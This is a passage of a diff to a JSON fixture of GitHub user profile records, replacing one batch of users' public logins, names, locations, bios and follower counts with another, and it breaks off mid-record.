"nest_created_at": "2024-09-12T01:31:57.035Z", - "nest_updated_at": "2024-09-12T02:07:57.690Z", - "name": "W. de Boer", - "login": "walterdeboer", + "nest_created_at": "2024-09-22T09:37:32.617Z", + "nest_updated_at": "2024-09-22T19:36:34.450Z", + "name": "Andrei Serebriakov", + "login": "ansereb", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/11032733?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/39370640?v=4", "company": "", - "location": "Groningen", + "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 3, + "followers_count": 4, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2015-02-16T17:07:08Z", - "updated_at": "2024-05-06T11:36:28Z", - "node_id": "MDQ6VXNlcjExMDMyNzMz", + "public_repositories_count": 11, + "created_at": "2018-05-17T10:00:33Z", + "updated_at": "2023-12-19T15:09:46Z", + "node_id": "MDQ6VXNlcjM5MzcwNjQw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -423853,99 +683352,99 @@ }, { "model": "github.user", - "pk": 2545, + "pk": 7898, "fields": { - "nest_created_at": "2024-09-12T01:32:06.681Z", - "nest_updated_at": "2024-09-12T01:33:18.070Z", - "name": "", - "login": "FabioRighe", + "nest_created_at": "2024-09-22T09:37:32.943Z", + "nest_updated_at": "2024-09-22T19:36:34.763Z", + "name": "André Alves", + "login": "andremralves", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/37578397?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/71379045?v=4", "company": "", - "location": "", + "location": "Brazil", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 33, + "followers_count": 26, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2018-03-20T10:21:16Z", - "updated_at": "2023-05-19T08:36:47Z", - "node_id": "MDQ6VXNlcjM3NTc4Mzk3", - "bio": "", + "public_repositories_count": 40, + "created_at": "2020-09-16T09:29:26Z", + "updated_at": "2024-09-20T15:59:11Z", + "node_id": "MDQ6VXNlcjcxMzc5MDQ1", + "bio": "Software Engineering at UnB (University of Brasilia).", "is_hireable": false, - "twitter_username": "" + "twitter_username": "andrealvesdev" } }, { "model": "github.user", - "pk": 2546, + "pk": 7899, "fields": { - "nest_created_at": "2024-09-12T01:32:11.334Z", - "nest_updated_at": "2024-09-12T01:37:42.434Z", - "name": "Roberto Polli", - "login": "ioggstream", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1140844?v=4", - "company": "@par-tec ", - "location": "Latina, Italia", + "nest_created_at": "2024-09-22T09:37:33.251Z", + "nest_updated_at": "2024-09-22T19:36:35.083Z", + "name": "Aniket Mathur", + "login": "Aniket21mathur", + "email": "aniket.m@rigi.club", + "avatar_url": "https://avatars.githubusercontent.com/u/35092582?v=4", + "company": " @chapel-lang", + "location": "IIT Roorkee", "collaborators_count": 0, - "following_count": 101, - "followers_count": 113, - "public_gists_count": 129, - "public_repositories_count": 316, - "created_at": "2011-10-20T14:03:08Z", - "updated_at": "2024-08-03T17:18:07Z", - "node_id": "MDQ6VXNlcjExNDA4NDQ=", - "bio": "Python enthusiast, former mathematician, opensource lover. @httpwg @italia ", + "following_count": 119, + "followers_count": 133, + "public_gists_count": 0, + "public_repositories_count": 35, + "created_at": "2018-01-04T06:23:57Z", + "updated_at": "2024-09-09T11:32:13Z", + "node_id": "MDQ6VXNlcjM1MDkyNTgy", + "bio": "GSOC'21 Mentor @chapel-lang | GSOC'20 @chapel-lang | GSOC'19 @sugarlabs | GCI'19 Mentor @sugarlabs", "is_hireable": false, - "twitter_username": "" + "twitter_username": "aniketmathur320" } }, { "model": "github.user", - "pk": 2547, + "pk": 7900, "fields": { - "nest_created_at": "2024-09-12T01:32:14.697Z", - "nest_updated_at": "2024-09-12T01:32:20.610Z", - "name": "", - "login": "bburdick-code", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/61505667?v=4", + "nest_created_at": "2024-09-22T09:37:33.887Z", + "nest_updated_at": "2024-09-22T19:40:06.017Z", + "name": "Anton", + "login": "Hunroll", + "email": "Hunroll16@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3989323?v=4", "company": "", - "location": "St. Louis", + "location": "Ukraine", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 1, + "followers_count": 6, "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2020-02-26T13:33:06Z", - "updated_at": "2023-03-03T16:10:15Z", - "node_id": "MDQ6VXNlcjYxNTA1NjY3", - "bio": "From 2016-2020, I have worked as a control systems engineer. My favorite part was programming, and I am ready to make it a full time gig. ", + "public_repositories_count": 7, + "created_at": "2013-03-27T21:26:43Z", + "updated_at": "2024-08-21T14:01:47Z", + "node_id": "MDQ6VXNlcjM5ODkzMjM=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2548, + "pk": 7901, "fields": { - "nest_created_at": "2024-09-12T01:32:15.962Z", - "nest_updated_at": "2024-09-16T22:28:43.270Z", + "nest_created_at": "2024-09-22T09:37:34.221Z", + "nest_updated_at": "2024-09-22T19:36:36.098Z", "name": "", - "login": "sathish-ather", + "login": "Antoningggg", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/81147114?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/3066260?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-03-22T07:19:14Z", - "updated_at": "2024-09-10T09:53:04Z", - "node_id": "MDQ6VXNlcjgxMTQ3MTE0", + "public_repositories_count": 1, + "created_at": "2012-12-17T20:20:52Z", + "updated_at": "2024-01-14T17:04:01Z", + "node_id": "MDQ6VXNlcjMwNjYyNjA=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -423953,49 +683452,49 @@ }, { "model": "github.user", - "pk": 2549, + "pk": 7902, "fields": { - "nest_created_at": "2024-09-12T01:32:19.314Z", - "nest_updated_at": "2024-09-12T01:32:19.314Z", - "name": "aditya ranaut", - "login": "phoenix-aditya", - "email": "ranout.aditya@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/57615219?v=4", - "company": "@projectX-india ", - "location": "", + "nest_created_at": "2024-09-22T09:37:34.533Z", + "nest_updated_at": "2024-09-22T19:36:36.415Z", + "name": "Apostolos Vlachopoulos", + "login": "avlahop", + "email": "avlahop@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3893010?v=4", + "company": "", + "location": "Thessaloniki", "collaborators_count": 0, - "following_count": 7, - "followers_count": 26, + "following_count": 3, + "followers_count": 4, "public_gists_count": 0, - "public_repositories_count": 23, - "created_at": "2019-11-11T07:21:36Z", - "updated_at": "2024-08-28T12:30:45Z", - "node_id": "MDQ6VXNlcjU3NjE1MjE5", + "public_repositories_count": 5, + "created_at": "2013-03-17T20:59:02Z", + "updated_at": "2024-09-18T11:24:40Z", + "node_id": "MDQ6VXNlcjM4OTMwMTA=", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2550, + "pk": 7903, "fields": { - "nest_created_at": "2024-09-12T01:32:21.870Z", - "nest_updated_at": "2024-09-12T01:32:21.870Z", - "name": "", - "login": "ab235g", + "nest_created_at": "2024-09-22T09:37:34.886Z", + "nest_updated_at": "2024-09-22T19:36:36.769Z", + "name": "Artem Tykhonov", + "login": "art-tykh", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/11493921?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1598859?v=4", "company": "", - "location": "", + "location": "Україна", "collaborators_count": 0, - "following_count": 2, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2015-03-16T00:58:13Z", - "updated_at": "2023-08-09T22:52:35Z", - "node_id": "MDQ6VXNlcjExNDkzOTIx", + "following_count": 0, + "followers_count": 5, + "public_gists_count": 6, + "public_repositories_count": 30, + "created_at": "2012-04-02T16:25:06Z", + "updated_at": "2024-09-16T11:25:35Z", + "node_id": "MDQ6VXNlcjE1OTg4NTk=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -424003,24 +683502,24 @@ }, { "model": "github.user", - "pk": 2551, + "pk": 7904, "fields": { - "nest_created_at": "2024-09-12T01:32:23.554Z", - "nest_updated_at": "2024-09-12T01:32:23.554Z", - "name": "Amael", - "login": "AppSecAmael", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/99711941?v=4", + "nest_created_at": "2024-09-22T09:37:35.215Z", + "nest_updated_at": "2024-09-22T19:36:37.084Z", + "name": "Ash", + "login": "abelmokadem", + "email": "a.belmokadem@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/9717944?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 12, - "created_at": "2022-02-15T06:10:22Z", - "updated_at": "2024-08-09T15:29:13Z", - "node_id": "U_kgDOBfF7xQ", + "following_count": 13, + "followers_count": 25, + "public_gists_count": 2, + "public_repositories_count": 41, + "created_at": "2014-11-13T11:11:57Z", + "updated_at": "2024-08-21T11:37:36Z", + "node_id": "MDQ6VXNlcjk3MTc5NDQ=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -424028,49 +683527,49 @@ }, { "model": "github.user", - "pk": 2552, + "pk": 7905, "fields": { - "nest_created_at": "2024-09-12T01:32:26.518Z", - "nest_updated_at": "2024-09-12T01:32:26.518Z", - "name": "Matija Folnovic", - "login": "mfolnovic", + "nest_created_at": "2024-09-22T09:37:35.850Z", + "nest_updated_at": "2024-09-22T19:36:37.715Z", + "name": "A", + "login": "tutasla", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/20919?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/39023505?v=4", "company": "", - "location": "Zagreb, Croatia", + "location": "", "collaborators_count": 0, - "following_count": 7, - "followers_count": 17, - "public_gists_count": 7, - "public_repositories_count": 28, - "created_at": "2008-08-17T11:07:27Z", - "updated_at": "2024-08-22T11:53:30Z", - "node_id": "MDQ6VXNlcjIwOTE5", + "following_count": 3, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 4, + "created_at": "2018-05-06T09:17:38Z", + "updated_at": "2024-03-03T16:29:58Z", + "node_id": "MDQ6VXNlcjM5MDIzNTA1", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2553, + "pk": 7906, "fields": { - "nest_created_at": "2024-09-12T01:32:34.053Z", - "nest_updated_at": "2024-09-12T01:32:34.053Z", - "name": "", - "login": "mischa-n", + "nest_created_at": "2024-09-22T09:37:36.159Z", + "nest_updated_at": "2024-09-22T19:36:38.029Z", + "name": "Axel Pavageau", + "login": "axelpavageauekino", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/54059083?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/97678820?v=4", + "company": "Ekino", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, "public_repositories_count": 0, - "created_at": "2019-08-13T08:12:05Z", - "updated_at": "2023-05-03T09:04:10Z", - "node_id": "MDQ6VXNlcjU0MDU5MDgz", + "created_at": "2022-01-13T13:19:41Z", + "updated_at": "2023-08-01T15:08:37Z", + "node_id": "U_kgDOBdJ15A", "bio": "", "is_hireable": false, "twitter_username": "" @@ -424078,124 +683577,124 @@ }, { "model": "github.user", - "pk": 2554, + "pk": 7907, "fields": { - "nest_created_at": "2024-09-12T01:32:37.313Z", - "nest_updated_at": "2024-09-12T01:32:37.313Z", - "name": "xsc", - "login": "xscsaa123456", + "nest_created_at": "2024-09-22T09:37:36.463Z", + "nest_updated_at": "2024-09-22T19:36:38.344Z", + "name": "Ayvaz", + "login": "Bagautdino", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/121541322?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/51779102?v=4", + "company": "ITMO", + "location": "Saint Petersburg", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 37, + "followers_count": 21, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2022-12-28T07:24:31Z", - "updated_at": "2024-09-05T09:31:08Z", - "node_id": "U_kgDOBz6Syg", - "bio": "", + "public_repositories_count": 23, + "created_at": "2019-06-13T07:57:43Z", + "updated_at": "2024-09-06T12:44:27Z", + "node_id": "MDQ6VXNlcjUxNzc5MTAy", + "bio": "____________________________________________", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2555, + "pk": 7908, "fields": { - "nest_created_at": "2024-09-12T01:32:38.977Z", - "nest_updated_at": "2024-09-12T01:32:38.977Z", - "name": "Marc Elser", - "login": "marcelser", - "email": "melser@gmx.ch", - "avatar_url": "https://avatars.githubusercontent.com/u/109926?v=4", + "nest_created_at": "2024-09-22T09:37:36.779Z", + "nest_updated_at": "2024-09-22T19:36:38.661Z", + "name": "Joe Siewert", + "login": "joesiewert", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1104976?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 2, + "following_count": 36, + "followers_count": 20, "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2009-07-29T17:05:22Z", - "updated_at": "2024-09-03T08:14:33Z", - "node_id": "MDQ6VXNlcjEwOTkyNg==", - "bio": "", + "public_repositories_count": 79, + "created_at": "2011-10-05T14:14:18Z", + "updated_at": "2024-04-22T18:49:46Z", + "node_id": "MDQ6VXNlcjExMDQ5NzY=", + "bio": "🏔🏔🏔", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2556, + "pk": 7909, "fields": { - "nest_created_at": "2024-09-12T01:32:49.033Z", - "nest_updated_at": "2024-09-12T01:32:49.033Z", - "name": "", - "login": "h4r7w3l1", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/36492399?v=4", - "company": "", - "location": "localhost", + "nest_created_at": "2024-09-22T09:37:37.118Z", + "nest_updated_at": "2024-09-22T19:36:38.972Z", + "name": "Jonathan Walker (Keenan)", + "login": "keenan-v1", + "email": "jonathan@wantsmore.coffee", + "avatar_url": "https://avatars.githubusercontent.com/u/2093265?v=4", + "company": "@lindenlab ", + "location": "Somewhere in the world", "collaborators_count": 0, - "following_count": 19, - "followers_count": 4, - "public_gists_count": 4, - "public_repositories_count": 16, - "created_at": "2018-02-14T23:41:59Z", - "updated_at": "2024-08-20T11:51:38Z", - "node_id": "MDQ6VXNlcjM2NDkyMzk5", - "bio": "", - "is_hireable": false, + "following_count": 7, + "followers_count": 7, + "public_gists_count": 8, + "public_repositories_count": 61, + "created_at": "2012-08-04T06:04:15Z", + "updated_at": "2024-08-05T15:46:05Z", + "node_id": "MDQ6VXNlcjIwOTMyNjU=", + "bio": "I break things, and usually fix them.", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2557, + "pk": 7910, "fields": { - "nest_created_at": "2024-09-12T01:32:51.958Z", - "nest_updated_at": "2024-09-12T01:32:51.958Z", - "name": "Kashish Topiwala", - "login": "kashishtopi", + "nest_created_at": "2024-09-22T09:37:37.474Z", + "nest_updated_at": "2024-09-22T19:38:20.845Z", + "name": "Jonathan Yang", + "login": "jonathanyang-grabtaxi", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/46081558?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/65696990?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 3, - "followers_count": 7, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2018-12-23T06:55:55Z", - "updated_at": "2024-08-03T16:17:23Z", - "node_id": "MDQ6VXNlcjQ2MDgxNTU4", - "bio": "Learning to Automate stuff. Demystifying complex topics as a hobby.", - "is_hireable": true, + "public_repositories_count": 0, + "created_at": "2020-05-21T03:38:21Z", + "updated_at": "2020-05-21T03:44:55Z", + "node_id": "MDQ6VXNlcjY1Njk2OTkw", + "bio": "", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2558, + "pk": 7911, "fields": { - "nest_created_at": "2024-09-12T01:32:53.367Z", - "nest_updated_at": "2024-09-12T01:32:53.367Z", - "name": "Zack Sarver", - "login": "zts3y", + "nest_created_at": "2024-09-22T09:37:37.790Z", + "nest_updated_at": "2024-09-22T19:36:39.610Z", + "name": "", + "login": "JoshBrodieTM", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/42187698?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/103633070?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2018-08-07T19:41:39Z", - "updated_at": "2024-08-06T02:49:33Z", - "node_id": "MDQ6VXNlcjQyMTg3Njk4", + "public_repositories_count": 1, + "created_at": "2022-04-14T08:30:38Z", + "updated_at": "2022-09-20T22:29:24Z", + "node_id": "U_kgDOBi1Qrg", "bio": "", "is_hireable": false, "twitter_username": "" @@ -424203,24 +683702,24 @@ }, { "model": "github.user", - "pk": 2559, + "pk": 7912, "fields": { - "nest_created_at": "2024-09-12T01:32:56.242Z", - "nest_updated_at": "2024-09-12T01:32:56.242Z", - "name": "", - "login": "20appy23", + "nest_created_at": "2024-09-22T09:37:38.110Z", + "nest_updated_at": "2024-09-22T19:36:39.924Z", + "name": "Juan Perez", + "login": "bvcelari", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/130068935?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1706007?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-04-06T13:40:26Z", - "updated_at": "2024-05-25T05:59:04Z", - "node_id": "U_kgDOB8Cxxw", + "following_count": 3, + "followers_count": 2, + "public_gists_count": 15, + "public_repositories_count": 52, + "created_at": "2012-05-04T13:58:49Z", + "updated_at": "2024-09-11T08:35:34Z", + "node_id": "MDQ6VXNlcjE3MDYwMDc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -424228,49 +683727,49 @@ }, { "model": "github.user", - "pk": 2560, + "pk": 7913, "fields": { - "nest_created_at": "2024-09-12T01:32:57.917Z", - "nest_updated_at": "2024-09-16T22:28:46.441Z", - "name": "Roman Sholokh", - "login": "rsholokh", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/67190621?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T09:37:38.424Z", + "nest_updated_at": "2024-09-22T19:36:40.231Z", + "name": "Julien Caillon", + "login": "jcaillon", + "email": "julien.caillon@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/11553075?v=4", + "company": "Noyacode", + "location": "France, Lyon Area", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2020-06-20T11:10:55Z", - "updated_at": "2023-08-12T17:20:46Z", - "node_id": "MDQ6VXNlcjY3MTkwNjIx", - "bio": "", + "following_count": 22, + "followers_count": 40, + "public_gists_count": 4, + "public_repositories_count": 39, + "created_at": "2015-03-19T08:49:49Z", + "updated_at": "2024-02-22T21:51:04Z", + "node_id": "MDQ6VXNlcjExNTUzMDc1", + "bio": "Coding is my job and passion.\r\nIn my spare time, I'm on github to share code and knowledge.\r\nhttp://bit.ly/2QKa9QN", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2561, + "pk": 7914, "fields": { - "nest_created_at": "2024-09-12T01:32:59.146Z", - "nest_updated_at": "2024-09-16T22:28:44.376Z", + "nest_created_at": "2024-09-22T09:37:38.728Z", + "nest_updated_at": "2024-09-22T19:36:40.545Z", "name": "", - "login": "TerrySunTW", + "login": "KJana12", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/8406228?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/168723969?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 15, - "followers_count": 3, - "public_gists_count": 1, - "public_repositories_count": 33, - "created_at": "2014-08-10T03:59:31Z", - "updated_at": "2024-08-15T00:03:12Z", - "node_id": "MDQ6VXNlcjg0MDYyMjg=", + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2024-05-02T09:18:24Z", + "updated_at": "2024-06-17T08:54:55Z", + "node_id": "U_kgDOCg6GAQ", "bio": "", "is_hireable": false, "twitter_username": "" @@ -424278,24 +683777,24 @@ }, { "model": "github.user", - "pk": 2562, + "pk": 7915, "fields": { - "nest_created_at": "2024-09-12T01:33:00.852Z", - "nest_updated_at": "2024-09-12T01:33:00.852Z", - "name": "Ben Edwards", - "login": "Legeril", + "nest_created_at": "2024-09-22T09:37:39.976Z", + "nest_updated_at": "2024-09-22T19:36:41.813Z", + "name": "KjeldP", + "login": "Kjeld-P", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/48111476?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/8656230?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 0, + "following_count": 0, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2019-03-01T02:24:39Z", - "updated_at": "2024-01-31T20:01:58Z", - "node_id": "MDQ6VXNlcjQ4MTExNDc2", + "public_repositories_count": 2, + "created_at": "2014-09-04T13:44:39Z", + "updated_at": "2024-09-19T09:29:24Z", + "node_id": "MDQ6VXNlcjg2NTYyMzA=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -424303,24 +683802,24 @@ }, { "model": "github.user", - "pk": 2563, + "pk": 7916, "fields": { - "nest_created_at": "2024-09-12T01:33:03.773Z", - "nest_updated_at": "2024-09-12T01:33:03.773Z", - "name": "Antanas Jasaitis", - "login": "antanasja", + "nest_created_at": "2024-09-22T09:37:40.291Z", + "nest_updated_at": "2024-09-22T19:36:42.130Z", + "name": "Kristian Zondervan", + "login": "krizon", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/20260179?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/880695?v=4", + "company": "Netvlies & Partner @keepgettingbetter - Adding business value with technology", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2016-07-02T20:52:04Z", - "updated_at": "2024-06-18T17:17:46Z", - "node_id": "MDQ6VXNlcjIwMjYwMTc5", + "following_count": 16, + "followers_count": 27, + "public_gists_count": 3, + "public_repositories_count": 29, + "created_at": "2011-06-28T06:58:54Z", + "updated_at": "2024-04-29T09:02:30Z", + "node_id": "MDQ6VXNlcjg4MDY5NQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -424328,24 +683827,24 @@ }, { "model": "github.user", - "pk": 2564, + "pk": 7917, "fields": { - "nest_created_at": "2024-09-12T01:33:12.657Z", - "nest_updated_at": "2024-09-12T01:33:12.657Z", + "nest_created_at": "2024-09-22T09:37:40.614Z", + "nest_updated_at": "2024-09-22T19:36:42.444Z", "name": "", - "login": "josecu08", + "login": "LithiumBloom", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/31317588?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/29266387?v=4", + "company": "thomas.newbown", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2017-08-24T15:41:46Z", - "updated_at": "2023-12-02T20:04:04Z", - "node_id": "MDQ6VXNlcjMxMzE3NTg4", + "public_repositories_count": 2, + "created_at": "2017-06-08T01:02:22Z", + "updated_at": "2023-04-01T00:53:55Z", + "node_id": "MDQ6VXNlcjI5MjY2Mzg3", "bio": "", "is_hireable": false, "twitter_username": "" @@ -424353,24 +683852,24 @@ }, { "model": "github.user", - "pk": 2565, + "pk": 7918, "fields": { - "nest_created_at": "2024-09-12T01:33:13.904Z", - "nest_updated_at": "2024-09-12T01:33:13.904Z", - "name": "Marais van Zyl", - "login": "mieliespoor", + "nest_created_at": "2024-09-22T09:37:40.925Z", + "nest_updated_at": "2024-09-22T19:36:42.755Z", + "name": "", + "login": "moveecar", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5008243?v=4", - "company": "Verizon", - "location": "Dublin", + "avatar_url": "https://avatars.githubusercontent.com/u/100116271?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 3, - "followers_count": 1, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 14, - "created_at": "2013-07-14T19:20:42Z", - "updated_at": "2024-07-05T22:35:17Z", - "node_id": "MDQ6VXNlcjUwMDgyNDM=", + "public_repositories_count": 0, + "created_at": "2022-02-21T06:51:23Z", + "updated_at": "2024-03-19T13:27:51Z", + "node_id": "U_kgDOBfenLw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -424378,24 +683877,24 @@ }, { "model": "github.user", - "pk": 2566, + "pk": 7919, "fields": { - "nest_created_at": "2024-09-12T01:33:15.135Z", - "nest_updated_at": "2024-09-12T01:33:15.135Z", - "name": "Roberto Sanchez", - "login": "rsanchez-s", + "nest_created_at": "2024-09-22T09:37:41.237Z", + "nest_updated_at": "2024-09-22T19:36:43.074Z", + "name": "Manuel Jeckelmann", + "login": "maennel", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/41480001?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1587013?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 8, - "followers_count": 2, + "following_count": 4, + "followers_count": 16, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2018-07-20T13:58:14Z", - "updated_at": "2024-08-26T01:37:33Z", - "node_id": "MDQ6VXNlcjQxNDgwMDAx", + "public_repositories_count": 22, + "created_at": "2012-03-29T12:45:09Z", + "updated_at": "2024-09-19T18:47:38Z", + "node_id": "MDQ6VXNlcjE1ODcwMTM=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -424403,74 +683902,74 @@ }, { "model": "github.user", - "pk": 2567, + "pk": 7920, "fields": { - "nest_created_at": "2024-09-12T01:33:20.607Z", - "nest_updated_at": "2024-09-12T01:33:20.607Z", - "name": "Erika Dvarionaite", - "login": "ErikaDva", + "nest_created_at": "2024-09-22T09:37:41.869Z", + "nest_updated_at": "2024-09-22T19:36:43.749Z", + "name": "Matt Schuman", + "login": "schuman0", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/43474174?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/6685345?v=4", "company": "", - "location": "Denmark", + "location": "", "collaborators_count": 0, - "following_count": 101, - "followers_count": 38, + "following_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 46, - "created_at": "2018-09-21T13:44:52Z", - "updated_at": "2024-09-10T12:57:44Z", - "node_id": "MDQ6VXNlcjQzNDc0MTc0", - "bio": "Data Engineer | R/Shiny Developer", + "public_repositories_count": 4, + "created_at": "2014-02-14T19:56:40Z", + "updated_at": "2024-05-06T11:51:12Z", + "node_id": "MDQ6VXNlcjY2ODUzNDU=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2568, + "pk": 7921, "fields": { - "nest_created_at": "2024-09-12T01:33:21.842Z", - "nest_updated_at": "2024-09-12T01:34:23.749Z", - "name": "Javier J. Salmerón García", - "login": "javsalgar", - "email": "javier.salmeron@broadcom.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1133777?v=4", - "company": "Broadcom", - "location": "Seville, Spain", + "nest_created_at": "2024-09-22T09:37:42.188Z", + "nest_updated_at": "2024-09-22T19:36:44.065Z", + "name": "Matthew Saeed", + "login": "matt7277", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1328551?v=4", + "company": "Discovery, Inc", + "location": "Washington, D.C.", "collaborators_count": 0, - "following_count": 1, - "followers_count": 92, - "public_gists_count": 13, - "public_repositories_count": 44, - "created_at": "2011-10-17T17:20:57Z", - "updated_at": "2024-09-11T14:47:57Z", - "node_id": "MDQ6VXNlcjExMzM3Nzc=", - "bio": "Staff Engineer @ Broadcom", + "following_count": 8, + "followers_count": 4, + "public_gists_count": 1, + "public_repositories_count": 16, + "created_at": "2012-01-13T19:08:51Z", + "updated_at": "2023-11-02T18:15:45Z", + "node_id": "MDQ6VXNlcjEzMjg1NTE=", + "bio": "Sr Director, Security Architecture", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2569, + "pk": 7922, "fields": { - "nest_created_at": "2024-09-12T01:33:23.523Z", - "nest_updated_at": "2024-09-12T01:33:23.523Z", - "name": "", - "login": "Lifter-PL", + "nest_created_at": "2024-09-22T09:37:43.112Z", + "nest_updated_at": "2024-09-22T19:36:45.025Z", + "name": "Florian Wirtz", + "login": "fw-work", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/31290686?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/107422147?v=4", + "company": "@transferwise", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, "public_repositories_count": 2, - "created_at": "2017-08-23T19:27:08Z", - "updated_at": "2023-06-21T12:39:42Z", - "node_id": "MDQ6VXNlcjMxMjkwNjg2", + "created_at": "2022-06-13T15:27:44Z", + "updated_at": "2024-01-11T10:36:31Z", + "node_id": "U_kgDOBmchww", "bio": "", "is_hireable": false, "twitter_username": "" @@ -424478,49 +683977,49 @@ }, { "model": "github.user", - "pk": 2570, + "pk": 7923, "fields": { - "nest_created_at": "2024-09-12T01:33:25.172Z", - "nest_updated_at": 